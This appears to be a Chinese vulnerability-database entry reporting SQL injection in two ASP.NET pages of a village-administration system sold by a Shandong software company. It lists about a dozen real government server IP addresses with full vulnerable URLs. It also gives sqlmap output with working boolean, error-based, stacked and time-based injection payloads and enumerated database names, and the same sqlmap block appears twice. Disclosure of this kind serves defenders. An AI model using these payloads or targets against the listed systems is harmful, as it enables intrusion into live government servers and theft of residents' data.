|某政府系统两处注入打包 - VULHUB开源网络安全威胁库

某政府系统两处注入打包

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT ### 详细说明：山东农友软件公司官网:http://www.nongyou.com.cn/ 所有参数:tname和 CountryName都存在注入的。案例如下： http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村 http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河 http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村 http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 1.测试注入点:http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 [<img src="https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=???? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x717565737 1,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&Count ryName=???? Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=???? Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=???? --- [16:41:05] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:41:05] [INFO] fetching database names [16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [16:41:43] [INFO] the SQL query used returns 5503 entries [16:41:43] [INFO] retrieved: information_schema [16:41:45] [INFO] retrieved: commoa [16:41:46] [INFO] retrieved: commoa100001 [16:41:46] [INFO] retrieved: commoa100002 [16:41:47] [INFO] retrieved: commoa100003 [16:41:47] [INFO] retrieved: commoa100004 [16:41:48] [INFO] retrieved: commoa100005 [16:41:48] [INFO] retrieved: commoa100006 [16:41:48] [INFO] retrieved: commoa100007 [16:41:49] [INFO] retrieved: commoa100008 [16:41:49] [INFO] retrieved: commoa100009 [16:41:49] [INFO] retrieved: commoa100010 [16:41:50] [INFO] retrieved: commoa100011 [16:41:50] [INFO] retrieved: commoa100012 [16:41:51] [INFO] retrieved: commoa100013 [16:41:51] [INFO] retrieved: commoa100014 [16:41:51] [INFO] retrieved: commoa100015 [16:41:52] [INFO] retrieved: commoa100016 [16:41:52] [INFO] retrieved: commoa100017 [16:41:52] [INFO] retrieved: commoa100018 [16:41:53] [INFO] retrieved: commoa100019 [16:41:53] [INFO] retrieved: commoa100020 [16:41:55] [INFO] retrieved: commoa100021 [16:41:56] [INFO] retrieved: commoa100022 [16:41:56] [INFO] retrieved: commoa100023 [16:41:57] [INFO] retrieved: commoa100024 [16:41:57] [INFO] retrieved: commoa100025 [16:41:57] [INFO] retrieved: commoa100026 [16:41:58] [INFO] retrieved: commoa100027 [16:41:58] [INFO] retrieved: commoa100028 [16:41:59] [INFO] retrieved: commoa100029 [16:41:59] [INFO] retrieved: commoa100030 [16:41:59] [INFO] retrieved: commoa100031 [16:42:00] [INFO] retrieved: commoa100032 [16:42:00] [INFO] retrieved: commoa100033 [16:42:00] [INFO] retrieved: commoa100034 [16:42:01] [INFO] retrieved: commoa100035 [16:42:01] [INFO] retrieved: commoa100036 [16:42:02] [INFO] retrieved: commoa100037 [16:42:02] [INFO] retrieved: commoa100038 [16:42:02] [INFO] retrieved: commoa100039 [16:42:03] [INFO] retrieved: commoa100040 [16:42:03] [INFO] retrieved: commoa100041 [16:42:04] [INFO] retrieved: commoa100042 [16:42:04] [INFO] retrieved: commoa100043 [16:42:04] [INFO] retrieved: commoa100044 [16:42:05] [INFO] retrieved: commoa100045 [16:42:05] [INFO] retrieved: commoa100046 [16:42:07] [INFO] retrieved: commoa100047 [16:42:08] [INFO] retrieved: commoa100048 [16:42:08] [INFO] retrieved: commoa100049 [16:42:08] [INFO] retrieved: commoa100050 [16:42:09] [INFO] retrieved: commoa100051 [16:42:09] [INFO] retrieved: commoa100052 [16:42:10] [INFO] retrieved: commoa100053 [16:42:10] [INFO] retrieved: commoa100054 [16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partia l output available databases [56]: [*] commoa [*] commoa100001 [*] commoa100002 [*] commoa100003 [*] commoa100004 [*] commoa100005 [*] commoa100006 [*] commoa100007 [*] commoa100008 [*] commoa100009 [*] commoa100010 [*] commoa100011 [*] commoa100012 [*] commoa100013 [*] commoa100014 [*] commoa100015 [*] commoa100016 [*] commoa100017 [*] commoa100018 [*] commoa100019 [*] commoa100020 [*] commoa100021 [*] commoa100022 [*] commoa100023 [*] commoa100024 [*] commoa100025 [*] commoa100026 [*] commoa100027 [*] commoa100028 [*] commoa100029 [*] commoa100030 [*] commoa100031 [*] commoa100032 [*] commoa100033 [*] commoa100034 [*] commoa100035 [*] commoa100036 [*] commoa100037 [*] commoa100038 [*] commoa100039 [*] commoa100040 [*] commoa100041 [*] commoa100042 [*] commoa100043 [*] commoa100044 [*] commoa100045 [*] commoa100046 [*] commoa100047 [*] commoa100048 [*] commoa100049 [*] commoa100050 [*] commoa100051 [*] commoa100052 [*] commoa100053 [*] commoa100054 [*] information_schema ``` 5000多表,没深入的跑了。我就测试这一个。其他均可复现。 ------------------------------------------------------------------- 第二处注入: http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村 http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村 http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村 http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼 http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房 http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟 1.测试注入点:http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村 [<img src="https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=??? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71 62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo g&CountryName=??? Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query) Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou ntryName=??? Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND ' qbiT'='qbiT&CountryName=??? --- [16:47:55] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:47:55] [INFO] fetching database names [16:47:55] [INFO] the SQL query used returns 17 entries [16:47:55] [INFO] retrieved: information_schema [16:47:55] [INFO] retrieved: cw_databasecomm0517 [16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin [16:47:55] [INFO] retrieved: cw_databasecommxh [16:47:56] [INFO] retrieved: cw_databasezbgx [16:47:56] [INFO] retrieved: cwdbcommzbgx100001 [16:47:56] [INFO] retrieved: cwdbcommzbgx100002 [16:47:56] [INFO] retrieved: cwdbcommzbgx100003 [16:47:56] [INFO] retrieved: cwdbcommzbgx100004 [16:47:56] [INFO] retrieved: cwdbcommzbgx100005 [16:47:56] [INFO] retrieved: cwdbcommzbgx100007 [16:47:56] [INFO] retrieved: mysql [16:47:56] [INFO] retrieved: nl_zbgaoxin [16:47:56] [INFO] retrieved: ny_landgxlz [16:47:56] [INFO] retrieved: test [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu available databases [17]: [*] cw_databasecomm0517 [*] cw_databasecomm22zbgaoxin [*] cw_databasecommxh [*] cw_databasezbgx [*] cwdbcommzbgx100001 [*] cwdbcommzbgx100002 [*] cwdbcommzbgx100003 [*] cwdbcommzbgx100004 [*] cwdbcommzbgx100005 [*] cwdbcommzbgx100007 [*] information_schema [*] mysql [*] nl_zbgaoxin [*] ny_landgxlz [*] test [*] village-levelmajor33zbgaoxin [*] village-levelmajor33zbgaoxinqu ``` 以上均可复现的。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=??? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71 62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo g&CountryName=??? Type: stacked queries Title: MySQL < 5.0.12 stacked queries (heavy query) Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou ntryName=??? Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND ' qbiT'='qbiT&CountryName=??? --- [16:47:55] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727 back-end DBMS: MySQL 5.0 [16:47:55] [INFO] fetching database names [16:47:55] [INFO] the SQL query used returns 17 entries [16:47:55] [INFO] retrieved: information_schema [16:47:55] [INFO] retrieved: cw_databasecomm0517 [16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin [16:47:55] [INFO] retrieved: cw_databasecommxh [16:47:56] [INFO] retrieved: cw_databasezbgx [16:47:56] [INFO] retrieved: cwdbcommzbgx100001 [16:47:56] [INFO] retrieved: cwdbcommzbgx100002 [16:47:56] [INFO] retrieved: cwdbcommzbgx100003 [16:47:56] [INFO] retrieved: cwdbcommzbgx100004 [16:47:56] [INFO] retrieved: cwdbcommzbgx100005 [16:47:56] [INFO] retrieved: cwdbcommzbgx100007 [16:47:56] [INFO] retrieved: mysql [16:47:56] [INFO] retrieved: nl_zbgaoxin [16:47:56] [INFO] retrieved: ny_landgxlz [16:47:56] [INFO] retrieved: test [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin [16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu available databases [17]: [*] cw_databasecomm0517 [*] cw_databasecomm22zbgaoxin [*] cw_databasecommxh [*] cw_databasezbgx [*] cwdbcommzbgx100001 [*] cwdbcommzbgx100002 [*] cwdbcommzbgx100003 [*] cwdbcommzbgx100004 [*] cwdbcommzbgx100005 [*] cwdbcommzbgx100007 [*] information_schema [*] mysql [*] nl_zbgaoxin [*] ny_landgxlz [*] test [*] village-levelmajor33zbgaoxin [*] village-levelmajor33zbgaoxinqu ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™